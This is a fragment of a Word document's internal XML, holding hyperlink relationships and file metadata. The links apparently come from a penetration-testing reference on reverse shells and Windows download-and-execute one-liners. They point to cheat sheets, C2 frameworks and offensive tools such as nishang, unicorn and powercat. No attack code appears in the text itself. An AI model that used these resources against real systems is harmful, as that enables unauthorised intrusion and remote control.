Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.gsocket.io/deploy/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/samratashok/nishang" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://reverse-shell.sh/" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/t0thkr1s/revshellgen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0x00-0x00/ShellPop" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lolbas-project.github.io/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://highon.coffee/blog/reverse-shell-cheat-sheet/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/trustedsec/unicorn" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/Arno0x" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Fahrj/reverse-ssh/releases/latest/" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/xct/xc/" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/koadic-com-command-control-framework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andrew-d/static-binaries" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carterjones/hello-world-dll" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SecureThisShit/WinPwn" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.revshells.com/" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mthbernardes/rsg" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/besimorhino/powercat" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/full-ttys" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cybervaca/ShellReverse" TargetMode="External"/><Relationship Id="rId7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pentestmonkey.net/cheat-sheet/shells/reverse-shell" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GreatSCT/GreatSCT" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Fahrj/reverse-ssh" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/IppSec/forward-shell" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jaredhaight/PSAttack" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ShutdownRepo/shellerator" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://weibell.github.io/reverse-shell-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3rada/toboggan.git" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/windows" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Fahrj/reverse-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5907</Words>
  <Characters>33674</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>280</Lines>
  <Paragraphs>79</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>39502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12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-07T05:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-07T05:54:00Z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2024-07-07T05:46:22Z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15187bcc-c6d9-482d-b1c3-d3bf5c3e153b</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_ContentBits">
    <vt:lpwstr>2</vt:lpwstr>
  </property>
</Properties>
</file>